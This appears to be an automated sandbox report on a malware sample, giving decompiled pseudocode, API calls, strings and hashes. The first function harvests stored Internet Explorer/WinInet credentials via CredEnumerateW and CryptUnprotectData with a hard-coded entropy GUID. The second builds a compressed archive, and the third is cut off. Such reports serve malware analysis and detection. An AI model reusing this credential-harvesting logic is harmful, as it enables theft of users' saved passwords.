API ID: Crypt$Hash$ContextDatalstrcatlstrlenwsprintf$AcquireCreateDestroyFreeLocalParamReleaseUnprotect
String ID: %02X$Software\Microsoft\Internet Explorer\IntelliForms\Storage2
API String ID: 1004607082-2450551051
Opcode ID: ccc312905a992053a4bf44560ffbc43a188dc2a988a734fc35293cbdba9feeec
Instruction ID: 07c72b7ba490a595c26f7f6d4f4aa1189c0a132ce0f92569a0f7abe98a213b6c
Opcode Fuzzy Hash: ccc312905a992053a4bf44560ffbc43a188dc2a988a734fc35293cbdba9feeec
Instruction Fuzzy Hash: C6512AB2D00209AFDB259BE5EC49FEE77BCAF44700F144029F905E2191DB749A16CB65

Uniqueness

Uniqueness Score: -1.00%

Function 001EA130, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 97
stringencryptionCOMMON

Download Yara Rule

C-Code - Quality: 28%

			E001EA130(void* __ecx) {
				void* _v8;
				char _v12;
				void* _v16;
				void* _v20;
				WCHAR* _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				short _v116;
				void* __ebp;
				WCHAR* _t43;
				void* _t48;
				signed int _t49;
				void* _t61;
				signed int _t63;
				intOrPtr _t65;
				void* _t67;
				signed int _t74;
				intOrPtr _t75;
				void* _t76;
				void* _t77;
				void* _t78;

				_t61 = __ecx;
				_t63 = 0x12;
				_t43 = memcpy( &_v116, L"abe2869f-9b47-4cd9-a358-c22904dba7f7", _t63 << 2);
				_t78 = _t77 + 0xc;
				asm("movsw");
				_t74 = 0;
				if(lstrlenW(_t43) <= 0) {
					L2:
					_v28 = 0x4a;
					_v24 =  &_v116;
					_v12 = 0;
					_v8 = 0;
					_t48 =  *0x22d040(L"Microsoft_WinInet_*", 0,  &_v8,  &_v12); // executed
					if(_t48 == 0) {
						L11:
						return _t48;
					}
					_t48 = _v8;
					if(_t48 == 0) {
						goto L11;
					}
					_t65 = _v12;
					if(_t65 == 0) {
						goto L11;
					} else {
						goto L5;
					}
					while(1) {
						L5:
						_t49 = _t48 - 1;
						_v8 = _t49;
						_t75 =  *((intOrPtr*)(_t65 + _t49 * 4));
						_v32 =  *((intOrPtr*)(_t75 + 0x1c));
						_v36 =  *((intOrPtr*)(_t75 + 0x18));
						_push( &_v20);
						_push(1);
						_push(0);
						_push(0);
						_v16 = 0;
						_push( &_v28);
						_push(0);
						_v20 = 0;
						_push( &_v36);
						if( *0x22d058() != 0) {
							_t85 = _v16;
							if(_v16 != 0) {
								_push(0);
								_push(0);
								_push(_v20);
								_push(_v16);
								_push( *((intOrPtr*)(_t75 + 8)));
								_t67 = 5;
								E001E9D30(_t61, _t67, _t85);
								_t78 = _t78 + 0x14;
								LocalFree(_v16);
							}
						}
						_t48 = _v8;
						if(_t48 == 0) {
							break;
						}
						_t65 = _v12;
					}
					_t40 =  &_v8;
					 *_t40 = _v8 | 0xffffffff;
					__eflags =  *_t40;
					return  *0x22d044(_v12);
				} else {
					goto L1;
				}
				do {
					L1:
					 *(_t76 + _t74 * 2 - 0x70) =  *(_t76 + _t74 * 2 - 0x70) << 2;
					_t74 = _t74 + 1;
				} while (_t74 < lstrlenW( &_v116));
				goto L2;
			}

0x001ea13e
0x001ea143
0x001ea149
0x001ea149
0x001ea14c
0x001ea154
0x001ea15a
0x001ea16d
0x001ea170
0x001ea177
0x001ea17f
0x001ea186
0x001ea190
0x001ea198
0x001ea223
0x001ea223
0x001ea223
0x001ea19e
0x001ea1a3
0x00000000
0x00000000
0x001ea1a5
0x001ea1aa
0x00000000
0x00000000
0x00000000
0x00000000
0x001ea1ac
0x001ea1ac
0x001ea1ac
0x001ea1ad
0x001ea1b0
0x001ea1b6
0x001ea1bc
0x001ea1c2
0x001ea1c3
0x001ea1c5
0x001ea1c6
0x001ea1ca
0x001ea1cd
0x001ea1ce
0x001ea1d2
0x001ea1d5
0x001ea1de
0x001ea1e0
0x001ea1e3
0x001ea1e5
0x001ea1e6
0x001ea1e7
0x001ea1ec
0x001ea1ef
0x001ea1f4
0x001ea1f5
0x001ea1fa
0x001ea200
0x001ea200
0x001ea1e3
0x001ea206
0x001ea20b
0x00000000
0x00000000
0x001ea20d
0x001ea20d
0x001ea215
0x001ea215
0x001ea215
0x00000000
0x00000000
0x00000000
0x00000000
0x001ea15c
0x001ea15c
0x001ea15c
0x001ea166
0x001ea169
0x00000000

APIs

lstrlenW.KERNEL32(?), ref: 001EA156
lstrlenW.KERNEL32(00000002), ref: 001EA167
CredEnumerateW.SECHOST(Microsoft_WinInet_*,00000000,00000000,?), ref: 001EA190
CryptUnprotectData.CRYPT32(?,00000000,0000004A,00000000,00000000,00000001,?), ref: 001EA1D6
LocalFree.KERNEL32(?), ref: 001EA200
CredFree.ADVAPI32(?), ref: 001EA219

Strings

abe2869f-9b47-4cd9-a358-c22904dba7f7, xrefs: 001EA144
J, xrefs: 001EA170
Microsoft_WinInet_*, xrefs: 001EA18B

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CredFreelstrlen$CryptDataEnumerateLocalUnprotect
String ID: J$Microsoft_WinInet_*$abe2869f-9b47-4cd9-a358-c22904dba7f7
API String ID: 186292201-3120203912
Opcode ID: 7be83b63fc5adbae35941e7d200215496ba7b6863cf7a4e9a36fd8449fc96235
Instruction ID: 9e5c59f8a58baa5ab2199ac51be2b136f00f141a22c56c842f100f5b427c0ee0
Opcode Fuzzy Hash: 7be83b63fc5adbae35941e7d200215496ba7b6863cf7a4e9a36fd8449fc96235
Instruction Fuzzy Hash: DB3126B5E00649ABCB20DF96D844DEEBBF9FF84700F50416AE912E3250D771AA06DB61

Uniqueness

Uniqueness Score: -1.00%

Function 001FE2E4, Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 469
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E001FE2E4(signed int* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v268;
				signed int _v272;
				signed int _v276;
				char _v284;
				char _v544;
				char _v804;
				signed int _v808;
				char* _v812;
				char* _v816;
				char _v1076;
				intOrPtr _v1080;
				signed int _v1084;
				signed int _v1088;
				short _v1090;
				short _v1092;
				signed int _v1096;
				intOrPtr _v1100;
				intOrPtr _v1104;
				char _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				unsigned int _v1124;
				short _v1126;
				signed int _v1128;
				short _v1130;
				char _v1132;
				char _v1144;
				char _v1145;
				char _v1156;
				short _v1160;
				signed int _v1164;
				char _v1168;
				char _v1169;
				char _v1170;
				char _v1171;
				char _v1172;
				char _v1173;
				char _v1174;
				char _v1175;
				char _v1176;
				char _v1177;
				char _v1178;
				char _v1179;
				char _v1180;
				char _v1184;
				signed int _v1188;
				signed int _v1192;
				char _v1193;
				intOrPtr _v1196;
				void* __esi;
				signed int _t223;
				signed int _t224;
				char _t231;
				short _t236;
				signed int _t238;
				signed int _t259;
				signed int _t268;
				signed int _t269;
				signed int _t274;
				signed int _t281;
				signed int _t283;
				signed int _t286;
				signed int _t287;
				signed int _t288;
				void* _t289;
				void* _t294;
				intOrPtr _t296;
				signed int _t300;
				signed int _t310;
				void* _t312;
				signed int _t317;
				signed int _t319;
				signed int _t321;
				signed int _t323;
				void* _t324;
				void* _t325;
				signed int _t326;
				signed int _t328;
				void* _t330;
				intOrPtr* _t333;
				signed int _t337;
				signed int _t354;
				intOrPtr _t355;
				signed int _t360;
				signed int _t380;
				signed int _t381;
				signed int _t382;
				signed int _t383;
				signed int _t384;
				signed int* _t387;
				intOrPtr _t390;
				intOrPtr _t392;
				intOrPtr _t393;
				signed int _t394;
				signed int _t397;
				void* _t399;
				void* _t400;
				void* _t401;

				_t399 = (_t397 & 0xfffffff8) - 0x4ac;
				_t390 = _a16;
				_t387 = __ecx;
				if(__ecx[5] == 0) {
					__eflags = __ecx[0xb];
					if(__ecx[0xb] == 0) {
						_v1164 = 0;
						_t330 = 0xc;
						__eflags =  *__ecx;
						if( *__ecx != 0) {
							__eflags = _t390 - 4;
							_t313 =  !=  ? _t330 : 0;
							_v1164 =  !=  ? _t330 : 0;
						}
						E00207420( &_v268, _a4);
						_t223 = _v268;
						__eflags = _t223;
						if(_t223 == 0) {
							L93:
							_t224 = 0x10000;
							goto L94;
						} else {
							_t333 =  &_v268;
							do {
								__eflags = _t223 - 0x5c;
								if(_t223 == 0x5c) {
									 *_t333 = 0x2f;
								}
								_t333 = _t333 + 1;
								_t223 =  *_t333;
								__eflags = _t223;
							} while (_t223 != 0);
							_push(8);
							_pop(0);
							__eflags = _t390 - 4;
							if(_t390 != 4) {
								L14:
								_v1188 = 0;
								_v1193 = 0;
								__eflags = _t390 - 4;
								if(__eflags == 0) {
									L16:
									__eflags = 0;
									_v1188 = 0;
									L17:
									__eflags = _t390 - 2;
									if(_t390 != 2) {
										__eflags = _t390 - 1;
										if(_t390 != 1) {
											__eflags = _t390 - 3;
											if(_t390 != 3) {
												__eflags = _t390 - 4;
												if(__eflags != 0) {
													goto L93;
												}
												_t224 = E001FE03E(_t387, __eflags);
												L25:
												__eflags = _t224;
												if(_t224 != 0) {
													goto L94;
												}
												_v272 = _v272 & _t224;
												E00207420( &_v1076, 0x23935b);
												E00207420( &_v804,  &_v268);
												_t231 = E0020B890( &_v804);
												_t400 = _t399 + 0x14;
												_v1108 = _t231;
												__eflags = _v1193;
												if(_v1193 != 0) {
													E00207430( &_v804, "/");
													_t33 =  &_v1108;
													 *_t33 = _v1108 + 1;
													__eflags =  *_t33;
												}
												E00207420( &_v544, 0x23935b);
												_v284 = 1;
												_v1090 = 0;
												_v808 = 0;
												_v1132 = 0xb17;
												_t236 = 0x14;
												_v1130 = _t236;
												_v1124 = _t387[0x1a];
												_t238 = 8;
												_v1096 = 0;
												_v276 = 0;
												_v1120 = 0;
												_v1128 = _t238;
												__eflags =  *_t387;
												if( *_t387 != 0) {
													__eflags = _t390 - 4;
													if(_t390 != 4) {
														_t238 = 9;
														_v1128 = _t238;
													}
												}
												_v1088 = _t238;
												_v1160 = 0;
												_v1126 = 0;
												__eflags = 0;
												if(0 != 0) {
													L34:
													_t337 = _t387[0x1c];
													_v1116 = 0;
													goto L35;
												} else {
													_t337 = _t387[0x1c];
													__eflags = _t337;
													if(_t337 < 0) {
														goto L34;
													}
													_v1116 = _v1164 + _t337;
													L35:
													_t317 = _t387[0x16];
													_v1092 = 0;
													_v1084 = _t387[0x13];
													_t380 = _t387[0x17];
													_v1080 = _t387[6] + _t387[4];
													_v816 =  &_v1184;
													_v812 =  &_v1144;
													_v1179 = _t387[0x16];
													_v1112 = _t337;
													_v1104 = 0x11;
													_v1178 = (_t380 << 0x00000020 | _t317) >> 8;
													_t381 = _t387[0x15];
													_v1175 = _t387[0x14];
													_v1177 = (_t380 << 0x00000020 | _t317) >> 0x10;
													_v1176 = (_t380 << 0x00000020 | _t317) >> 0x18;
													_t319 = _t387[0x14];
													_v1100 = 9;
													_v1174 = (_t381 << 0x00000020 | _t319) >> 8;
													_t382 = _t387[0x19];
													_v1171 = _t387[0x18];
													_v1173 = (_t381 << 0x00000020 | _t319) >> 0x10;
													_v1172 = (_t381 << 0x00000020 | _t319) >> 0x18;
													_t321 = _t387[0x18];
													_v1184 = 0xd5455;
													_v1170 = (_t382 << 0x00000020 | _t321) >> 8;
													_v1180 = 7;
													_v1169 = (_t382 << 0x00000020 | _t321) >> 0x10;
													_v1168 = (_t382 << 0x00000020 | _t321) >> 0x18;
													E00201550( &_v1144,  &_v1184, 9);
													_t401 = _t400 + 0xc;
													 *((char*)(_v812 + 2)) = 5;
													_t259 = E001FCE91( &_v1132, _t387);
													_pop(_t351);
													__eflags = _t259;
													if(_t259 == 0) {
														_t387[6] = _t387[6] + _v1108 + 0x1e + _v1104;
														__eflags = _t387[5];
														if(_t387[5] == 0) {
															_t387[0xc] = 0x12345678;
															_t387[0xd] = 0x23456789;
															_t387[0xe] = 0x34567890;
															_t323 =  *_t387;
															__eflags = _t323;
															if(_t323 == 0) {
																L43:
																__eflags =  *0x24c1d5;
																if( *0x24c1d5 == 0) {
																	_t300 = GetDesktopWindow();
																	__eflags = _t300 ^ GetTickCount();
																	E00211A58(_t351, _t300 ^ GetTickCount());
																	_pop(_t351);
																}
																_t324 = 0;
																__eflags = 0;
																do {
																	 *((char*)(_t401 + _t324 + 0x38)) = E00211A37(_t351, __eflags) >> 7;
																	_t324 = _t324 + 1;
																	__eflags = _t324 - 0xc;
																} while (__eflags < 0);
																_t325 = 0;
																__eflags = 0;
																_v1145 = _v1124 >> 8;
																do {
																	_t383 =  *((intOrPtr*)(_t401 + _t325 + 0x38));
																	 *((char*)(_t401 + _t325 + 0x38)) = E001FD884( &(_t387[0xc]), _t383, __eflags);
																	_t325 = _t325 + 1;
																	__eflags = _t325 - 0xc;
																} while (__eflags < 0);
																_t268 =  *_t387;
																_t392 = _a16;
																__eflags = _t268;
																if(_t268 != 0) {
																	__eflags = _t392 - 4;
																	if(_t392 != 4) {
																		E001FDCAA(_t387,  &_v1156, 0xc);
																		_t154 =  &(_t387[6]);
																		 *_t154 = _t387[6] + 0xc;
																		__eflags =  *_t154;
																		_t268 =  *_t387;
																	}
																}
																_v1192 = _v1192 & 0x00000000;
																__eflags = _t268;
																if(_t268 == 0) {
																	L55:
																	_t269 = 0;
																	__eflags = 0;
																	goto L56;
																} else {
																	__eflags = _t392 - 4;
																	if(_t392 == 4) {
																		goto L55;
																	}
																	_t269 = 1;
																	L56:
																	_t326 = _v1188;
																	_t387[0xb] = _t269;
																	__eflags = _t392 - 4;
																	if(_t392 == 4) {
																		_t174 =  &(_t387[0x24]);
																		 *_t174 = _t387[0x24] & 0x00000000;
																		__eflags =  *_t174;
																		L69:
																		_t387[0xb] = 0;
																		E001FE191(_t387);
																		_t354 = _t387[0x24];
																		_t387[6] = _t387[6] + _t354;
																		_t224 = _t387[5];
																		__eflags = _t224;
																		if(_t224 != 0) {
																			goto L94;
																		}
																		__eflags = _v1192 - _t224;
																		if(_v1192 != _t224) {
																			L37:
																			_t224 = 0x400;
																			goto L94;
																		}
																		_t355 = _t354 + _v1164;
																		__eflags = _v1116 - _t355;
																		_t384 = _t383 & 0xffffff00 | _v1116 == _t355;
																		_v1120 = _t387[0x1e];
																		__eflags = _t387[7];
																		_v1116 = _t355;
																		_v1112 = _t387[0x1c];
																		if(_t387[7] == 0) {
																			L80:
																			__eflags = _v1126 - _v1160;
																			if(_v1126 != _v1160) {
																				L92:
																				_t224 = 0x4000000;
																				goto L94;
																			}
																			__eflags = _t326;
																			if(_t326 != 0) {
																				L83:
																				_t274 = E001FD0F8( &_v1132, _t387);
																				__eflags = _t274;
																				if(_t274 != 0) {
																					goto L37;
																				}
																				_t207 =  &(_t387[6]);
																				 *_t207 = _t387[6] + 0x10;
																				__eflags =  *_t207;
																				_v1128 = _v1088;
																				L85:
																				_t224 = _t387[5];
																				__eflags = _t224;
																				if(__eflags != 0) {
																					goto L94;
																				}
																				_t393 = E00200588(_t392, __eflags, _v1100);
																				E00201550(_t393, _v812, _v1100);
																				_v812 = _t393;
																				_t394 = E002001B8(_t393, __eflags, 0x360);
																				E00201550(_t394,  &_v1132, 0x360);
																				_t360 = _t387[0x11];
																				__eflags = _t360;
																				if(_t360 != 0) {
																					while(1) {
																						_t281 =  *(_t360 + 0x35c);
																						__eflags = _t281;
																						if(_t281 == 0) {
																							break;
																						}
																						_t360 = _t281;
																					}
																					 *(_t360 + 0x35c) = _t394;
																					L91:
																					_t224 = 0;
																					goto L94;
																				}
																				_t387[0x11] = _t394;
																				goto L91;
																			}
																			__eflags = _t384;
																			if(_t384 == 0) {
																				goto L92;
																			}
																			goto L83;
																		}
																		__eflags =  *_t387;
																		if( *_t387 == 0) {
																			L74:
																			_v1126 = _v1160;
																			_t283 = _v1128;
																			__eflags = _t283 & 0x00000001;
																			if((_t283 & 0x00000001) == 0) {
																				_t283 = _t283 & 0x0000fff7;
																				__eflags = _t283;
																				_v1128 = _t283;
																			}
																			_v1088 = _t283;
																			_t286 = E001FDD79(_t387, _v1080 - _t387[4]);
																			__eflags = _t286;
																			if(_t286 == 0) {
																				L79:
																				_t224 = 0x2000000;
																				goto L94;
																			} else {
																				_t287 = E001FCE91( &_v1132, _t387);
																				__eflags = _t287;
																				if(_t287 != 0) {
																					goto L37;
																				}
																				_t288 = E001FDD79(_t387, _t387[6]);
																				__eflags = _t288;
																				if(_t288 != 0) {
																					goto L85;
																				}
																				goto L79;
																			}
																		}
																		__eflags = _t392 - 4;
																		if(_t392 != 4) {
																			goto L80;
																		}
																		goto L74;
																	}
																	_t289 = 8;
																	__eflags = _t326 - _t289;
																	if(_t326 != _t289) {
																		__eflags = _t326;
																		if(_t326 != 0) {
																			goto L69;
																		}
																		_v1192 = _v1192 & _t326;
																		while(1) {
																			_t328 = E001FE0F8(_t387,  &(_t387[0x25]), 0x4000);
																			__eflags = _t328;
																			if(_t328 == 0) {
																				break;
																			}
																			__eflags = _t328 - 0xffffffff;
																			if(_t328 == 0xffffffff) {
																				break;
																			}
																			_t294 = E001FDCAA(_t387,  &(_t387[0x25]), _t328);
																			__eflags = _t294 - _t328;
																			if(_t294 != _t328) {
																				_v1192 = 0x60000;
																				L66:
																				_t326 = _v1188;
																				goto L69;
																			}
																			_t165 =  &_v1192;
																			 *_t165 = _v1192 + _t328;
																			__eflags =  *_t165;
																		}
																		_t169 =  &_v1192;
																		 *_t169 = _v1192 & 0x00000000;
																		__eflags =  *_t169;
																		_t387[0x24] = _v1192;
																		goto L66;
																	}
																	_t296 = E001FE1D2(_t387,  &_v1132); // executed
																	_v1196 = _t296;
																	goto L69;
																}
															} else {
																goto L41;
															}
															while(1) {
																L41:
																_t385 =  *_t323;
																__eflags =  *_t323;
																if( *_t323 == 0) {
																	goto L43;
																}
																_t351 =  &(_t387[0xc]);
																E001FD841( &(_t387[0xc]), _t385);
																_t323 = _t323 + 1;
																__eflags = _t323;
																if(_t323 != 0) {
																	continue;
																}
																goto L43;
															}
															goto L43;
														}
														E001FE191(_t387);
														_t224 = _t387[5];
														goto L94;
													}
													E001FE191(_t387);
													goto L37;
												}
											}
											_t224 = E001FDF71(_t387, _a8, _a12);
											goto L25;
										}
										_t224 = E001FDE51(_t387, _a8, _a12);
										goto L25;
									}
									_t224 = E001FDDD0(_t387, _a8); // executed
									goto L25;
								}
								_v1193 = 0;
								_t310 = E001FD8A5( &_v268, __eflags);
								__eflags = _t310;
								if(_t310 == 0) {
									goto L17;
								}
								goto L16;
							}
							_t312 = E0020B890( &_v268);
							__eflags =  *((char*)(_t399 + _t312 + 0x3af)) - 0x2f;
							if( *((char*)(_t399 + _t312 + 0x3af)) == 0x2f) {
								goto L14;
							}
							_v1193 = 1;
							goto L16;
						}
					}
					_t224 = 0x50000;
					goto L94;
				} else {
					_t224 = 0x40000;
					L94:
					return _t224;
				}
			}

0x001fe2ea
0x001fe2f2
0x001fe2f6
0x001fe2fc
0x001fe308
0x001fe30c
0x001fe31c
0x001fe320
0x001fe321
0x001fe323
0x001fe325
0x001fe328
0x001fe32b
0x001fe32b
0x001fe33a
0x001fe33f
0x001fe348
0x001fe34a
0x001fe8f5
0x001fe8f5
0x00000000
0x001fe350
0x001fe350
0x001fe357
0x001fe357
0x001fe359
0x001fe35b
0x001fe35b
0x001fe35e
0x001fe35f
0x001fe361
0x001fe361
0x001fe365
0x001fe367
0x001fe368
0x001fe36b
0x001fe38c
0x001fe38c
0x001fe390
0x001fe395
0x001fe398
0x001fe3af
0x001fe3af
0x001fe3b1
0x001fe3b5
0x001fe3b5
0x001fe3b8
0x001fe3c6
0x001fe3c9
0x001fe3da
0x001fe3dd
0x001fe3ee
0x001fe3f1
0x00000000
0x00000000
0x001fe3f9
0x001fe3fe
0x001fe3fe
0x001fe400
0x00000000
0x00000000
0x001fe406
0x001fe41a
0x001fe42f
0x001fe43c
0x001fe441
0x001fe444
0x001fe448
0x001fe44d
0x001fe45c
0x001fe461
0x001fe461
0x001fe461
0x001fe466
0x001fe474
0x001fe47b
0x001fe488
0x001fe494
0x001fe49d
0x001fe4a2
0x001fe4a3
0x001fe4ad
0x001fe4b1
0x001fe4b2
0x001fe4b6
0x001fe4bd
0x001fe4c1
0x001fe4c6
0x001fe4c8
0x001fe4ca
0x001fe4cd
0x001fe4d1
0x001fe4d2
0x001fe4d2
0x001fe4cd
0x001fe4d7
0x001fe4df
0x001fe4e3
0x001fe4e8
0x001fe4ea
0x001fe4ff
0x001fe4ff
0x001fe502
0x00000000
0x001fe4ec
0x001fe4ec
0x001fe4ef
0x001fe4f1
0x00000000
0x00000000
0x001fe4f9
0x001fe506
0x001fe508
0x001fe50b
0x001fe513
0x001fe520
0x001fe523
0x001fe52e
0x001fe539
0x001fe543
0x001fe549
0x001fe555
0x001fe55d
0x001fe56e
0x001fe571
0x001fe577
0x001fe57b
0x001fe57f
0x001fe58a
0x001fe592
0x001fe5a3
0x001fe5a6
0x001fe5ac
0x001fe5b0
0x001fe5b4
0x001fe5bf
0x001fe5c7
0x001fe5d7
0x001fe5e5
0x001fe5ea
0x001fe5ee
0x001fe5fe
0x001fe601
0x001fe606
0x001fe60b
0x001fe60c
0x001fe60e
0x001fe62c
0x001fe62f
0x001fe633
0x001fe644
0x001fe64b
0x001fe652
0x001fe659
0x001fe65b
0x001fe65d
0x001fe672
0x001fe672
0x001fe679
0x001fe67b
0x001fe689
0x001fe68c
0x001fe691
0x001fe691
0x001fe692
0x001fe692
0x001fe694
0x001fe69c
0x001fe6a0
0x001fe6a1
0x001fe6a1
0x001fe6ad
0x001fe6ad
0x001fe6af
0x001fe6b3
0x001fe6b3
0x001fe6bf
0x001fe6c3
0x001fe6c4
0x001fe6c4
0x001fe6c9
0x001fe6cb
0x001fe6ce
0x001fe6d0
0x001fe6d2
0x001fe6d5
0x001fe6e0
0x001fe6e5
0x001fe6e5
0x001fe6e5
0x001fe6e9
0x001fe6e9
0x001fe6d5
0x001fe6eb
0x001fe6f0
0x001fe6f2
0x001fe6fe
0x001fe6fe
0x001fe6fe
0x00000000
0x001fe6f4
0x001fe6f4
0x001fe6f7
0x00000000
0x00000000
0x001fe6fb
0x001fe700
0x001fe700
0x001fe704
0x001fe707
0x001fe70a
0x001fe783
0x001fe783
0x001fe783
0x001fe78a
0x001fe78c
0x001fe790
0x001fe795
0x001fe79b
0x001fe79e
0x001fe7a1
0x001fe7a3
0x00000000
0x00000000
0x001fe7a9
0x001fe7ad
0x001fe617
0x001fe617
0x00000000
0x001fe617
0x001fe7b3
0x001fe7b7
0x001fe7be
0x001fe7c1
0x001fe7c5
0x001fe7cc
0x001fe7d0
0x001fe7d4
0x001fe845
0x001fe849
0x001fe84e
0x001fe8ee
0x001fe8ee
0x00000000
0x001fe8ee
0x001fe854
0x001fe856
0x001fe860
0x001fe865
0x001fe86b
0x001fe86d
0x00000000
0x00000000
0x001fe878
0x001fe878
0x001fe878
0x001fe87c
0x001fe881
0x001fe881
0x001fe884
0x001fe886
0x00000000
0x00000000
0x001fe896
0x001fe8a0
0x001fe8a8
0x001fe8bb
0x001fe8c4
0x001fe8c9
0x001fe8cf
0x001fe8d1
0x001fe8da
0x001fe8da
0x001fe8e0
0x001fe8e2
0x00000000
0x00000000
0x001fe8d8
0x001fe8d8
0x001fe8e4
0x001fe8ea
0x001fe8ea
0x00000000
0x001fe8ea
0x001fe8d3
0x00000000
0x001fe8d3
0x001fe858
0x001fe85a
0x00000000
0x00000000
0x00000000
0x001fe85a
0x001fe7d6
0x001fe7d9
0x001fe7e0
0x001fe7e4
0x001fe7e9
0x001fe7ee
0x001fe7f0
0x001fe7f7
0x001fe7f7
0x001fe7fa
0x001fe7fa
0x001fe7ff
0x001fe811
0x001fe816
0x001fe818
0x001fe83b
0x001fe83b
0x00000000
0x001fe81a
0x001fe81f
0x001fe825
0x001fe827
0x00000000
0x00000000
0x001fe832
0x001fe837
0x001fe839
0x00000000
0x00000000
0x00000000
0x001fe839
0x001fe818
0x001fe7db
0x001fe7de
0x00000000
0x00000000
0x00000000
0x001fe7de
0x001fe70e
0x001fe70f
0x001fe711
0x001fe725
0x001fe727
0x00000000
0x00000000
0x001fe729
0x001fe74b
0x001fe75e
0x001fe760
0x001fe762
0x00000000
0x00000000
0x001fe72f
0x001fe732
0x00000000
0x00000000
0x001fe73e
0x001fe743
0x001fe745
0x001fe779
0x001fe773
0x001fe773
0x00000000
0x001fe773
0x001fe747
0x001fe747
0x001fe747
0x001fe747
0x001fe768
0x001fe768
0x001fe768
0x001fe76d
0x00000000
0x001fe76d
0x001fe71a
0x001fe71f
0x00000000
0x001fe71f
0x00000000
0x00000000
0x00000000
0x001fe65f
0x001fe65f
0x001fe65f
0x001fe661
0x001fe663
0x00000000
0x00000000
0x001fe665
0x001fe668
0x001fe66d
0x001fe66d
0x001fe670
0x00000000
0x00000000
0x00000000
0x001fe670
0x00000000
0x001fe65f
0x001fe637
0x001fe63c
0x00000000
0x001fe63c
0x001fe612
0x00000000
0x001fe612
0x001fe4ea
0x001fe3e7
0x00000000
0x001fe3e7
0x001fe3d3
0x00000000
0x001fe3d3
0x001fe3bf
0x00000000
0x001fe3bf
0x001fe3a1
0x001fe3a6
0x001fe3ab
0x001fe3ad
0x00000000
0x00000000
0x00000000
0x001fe3ad
0x001fe375
0x001fe37b
0x001fe383
0x00000000
0x00000000
0x001fe385
0x00000000
0x001fe385
0x001fe34a
0x001fe30e
0x00000000
0x001fe2fe
0x001fe2fe
0x001fe8fa
0x001fe900
0x001fe900

Strings

/, xrefs: 001FE37B
UT, xrefs: 001FE5BF

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: /$UT
API String ID: 0-1626504983
Opcode ID: 92d0440da8281d62c2e6078298ac68b46ffc06f9ae655e5bfddd841f15a5f269
Instruction ID: 47c41e0be956822e3e0addd950276183f5d40237657bc1914bd7dc2b2b1e892c
Opcode Fuzzy Hash: 92d0440da8281d62c2e6078298ac68b46ffc06f9ae655e5bfddd841f15a5f269
Instruction Fuzzy Hash: 6802D2716083899FD724DF68D4847BABBE5BFA5314F04082DF685C32A1E770E859CB92

Uniqueness

Uniqueness Score: -1.00%

Function 001DFD36, Relevance: 10.9, APIs: 2, Strings: 4, Instructions: 404
timeCOMMONCrypto

Download Yara Rule

C-Code - Quality: 89%

			E001DFD36(intOrPtr* __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				char _v264;
				char _v528;
				char _v532;
				unsigned int _v556;
				intOrPtr _v580;
				intOrPtr _v584;
				signed int _v592;
				unsigned int _v608;
				struct _FILETIME _v616;
				struct _FILETIME _v624;
				struct _SYSTEMTIME _v640;
				signed int _v644;
				struct _FILETIME _v652;
				char _v656;
				intOrPtr _v660;
				signed int _v664;
				char _v666;
				char _v667;
				signed int _v668;
				void* __esi;
				void* _t162;
				signed int _t168;
				signed int _t169;
				intOrPtr _t170;
				void* _t171;
				signed int _t177;
				signed int _t178;
				signed int _t185;
				signed int _t195;
				intOrPtr _t217;
				signed int _t226;
				signed char _t227;
				signed int _t234;
				signed int _t236;
				signed int _t242;
				signed int _t243;
				signed int _t245;
				signed int _t251;
				signed int _t252;
				signed int _t258;
				intOrPtr _t267;
				intOrPtr _t274;
				signed char _t307;
				unsigned int _t310;
				long _t313;
				intOrPtr _t315;
				unsigned int _t318;
				signed int _t327;
				signed int _t331;
				intOrPtr* _t333;
				unsigned int _t340;
				long _t342;
				signed int _t343;
				intOrPtr _t346;
				intOrPtr* _t352;
				signed int _t354;
				signed int _t355;
				intOrPtr* _t358;
				intOrPtr _t359;
				char _t360;
				void* _t361;
				signed int _t362;
				intOrPtr* _t364;

				_t364 = (_t362 & 0xfffffff8) - 0x29c;
				_t267 = _a4;
				_push(_t354);
				_t355 = _t354 | 0xffffffff;
				_t352 = __ecx;
				if(_t267 < _t355) {
					L62:
					_t162 = 0x10000;
					L63:
					return _t162;
				}
				_t277 =  *__ecx;
				if(_t267 >=  *((intOrPtr*)( *__ecx + 4))) {
					goto L62;
				}
				if( *((intOrPtr*)(__ecx + 4)) != _t355) {
					E001DFC22(_t277, __edx);
				}
				 *(_t352 + 4) = _t355;
				if(_t267 !=  *((intOrPtr*)(_t352 + 0x134))) {
					__eflags = _t267 - _t355;
					if(_t267 != _t355) {
						_t278 =  *_t352;
						__eflags =  *((intOrPtr*)( *_t352 + 0x10)) - _t267;
						if(__eflags <= 0) {
							L15:
							if(__eflags < 0) {
								E001DF697( *_t352);
								L14:
